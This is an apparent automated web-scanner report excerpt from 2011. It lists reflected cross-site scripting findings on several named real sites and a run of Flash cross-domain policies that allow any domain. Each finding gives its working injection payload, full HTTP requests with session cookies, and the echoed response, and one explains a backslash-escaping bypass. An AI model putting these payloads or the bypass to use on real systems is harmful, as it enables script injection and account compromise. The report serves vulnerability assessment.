Path:   /stylesheets/cache/topic-s_righthealth-chimborazo-153574.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b869f\"%3bff4d86bda9a was submitted in the REST URL parameter 2. This input was echoed as b869f\\";ff4d86bda9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /stylesheets/b869f\"%3bff4d86bda9a/topic-s_righthealth-chimborazo-153574.css?1305489648 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:22 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:22 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:22 GMT;path=/
Content-Length: 20785

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1651647200";
   kl.query = "B869f\\";ff4d86bda9a";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.58. http://www.tagged.com/api/ [data parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload 6975f<img%20src%3da%20onerror%3dalert(1)>70a7439d138 was submitted in the data parameter. This input was echoed as 6975f<img src=a onerror=alert(1)>70a7439d138 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /api/?application_id=user&format=json&session_token=k48nnbumc29k7tunhd4mautaa0 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532
Content-Length: 299


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=pkXrwJtpd9
method=tagged.util.echoIt&data=6975f<img%20src%3da%20onerror%3dalert(1)>70a7439d138&callback=tagged.header.alerts.init&api_signature=&track=pkXrwJtpd9
method=tagged.util.echoIt&data=300&callback=TAGGED.api.startDefer&api_signature=&track=pkXrwJtpd9

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:38:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 263

["{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 27.50\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 27.50\",\"result\":\"6975f<img src=a onerror=alert(1)>70a7439d138\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 27.50\",\"result\":\"300\"}"]

4.59. http://www.tagged.com/api/ [data parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload fe9eb<img%20src%3da%20onerror%3dalert(1)>86b79eec8684e9321 was submitted in the data parameter. This input was echoed as fe9eb<img src=a onerror=alert(1)>86b79eec8684e9321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=json&session_token=k48nnbumc29k7tunhd4mautaa0&method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=pkXrwJtpd9&method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=pkXrwJtpd9&method=tagged.util.echoIt&data=300fe9eb<img%20src%3da%20onerror%3dalert(1)>86b79eec8684e9321&callback=TAGGED.api.startDefer&api_signature=&track=pkXrwJtpd9 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:41:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 106

{"stat":"ok","diagnostics":"1 2.3 26.64","result":"300fe9eb<img src=a onerror=alert(1)>86b79eec8684e9321"}

4.60. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32395"><script>alert(1)</script>94fad20c9dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 32395"><script>alert(1)</script>94fad20c9dc

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:36:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Corporate+Design&blogurl=32395"><script>alert(1)</script>94fad20c9dc&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

4.61. http://www.kosmix.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953d7'-alert(1)-'f7617ef5c29 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24953d7'-alert(1)-'f7617ef5c29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:01:14 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=02e66700-615c-012e-dbad-003048fe3090; path=/; expires=Sat, 15-May-2021 20:01:14 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:01:14 GMT
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:01:14 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:03:14 GMT;path=/
Content-Length: 15708

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
   
   kl.page_type = 'o';
   kl.initialize();
   kapp.page = 'true';
   kapp.searchCookie = ['kosmix','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24953d7'-alert(1)-'f7617ef5c29'];
   </script>
...[SNIP]...

4.62. http://www.righthealth.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c514c'-alert(1)-'909ad3854c2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24c514c'-alert(1)-'909ad3854c2
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:02:31 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=30f335e0-615c-012e-a7e8-003048fe47fa; path=/; expires=Sat, 15-May-2021 20:02:31 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:02:31 GMT
Set-Cookie: KC=K; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:02:31 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:17:31 GMT;path=/
Content-Length: 56037

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
.page_type = 'o';
   kl.initialize();
   kapp.page = 'true';
   kapp.searchCookie = ['righthealth','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24c514c'-alert(1)-'909ad3854c2'];
   </script>
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 44 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://a.dlqm.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.dlqm.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.dlqm.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=160
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.2. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 15 May 2011 18:35:46 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1394"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 15 May 2011 18:35:47 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

5.4. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 75190

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.5. http://amch.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:50 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-f999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=890
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.6. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 20:01:15 GMT
X-FB-Server: 10.42.60.67
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

5.7. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 18:23:54 GMT
Date: Sun, 15 May 2011 18:23:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.8. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sun, 15 May 2011 18:35:34 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.9. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:02 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.10. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 15 May 2011 18:38:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.11. http://c5.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Sun, 15 May 2011 18:35:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.12. http://c7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3585
Date: Sun, 15 May 2011 18:35:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.13. https://console.iservices.net.nz/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.iservices.net.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: console.iservices.net.nz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:33:30 GMT
Server: Apache
Last-Modified: Sat, 29 May 2010 23:33:46 GMT
ETag: "5c820f-c9-487c40e0e4a80"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.14. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Sun, 15 May 2011 17:35:37 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.15. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 18:35:56 GMT; domain=.adnxs.com; HttpOnly
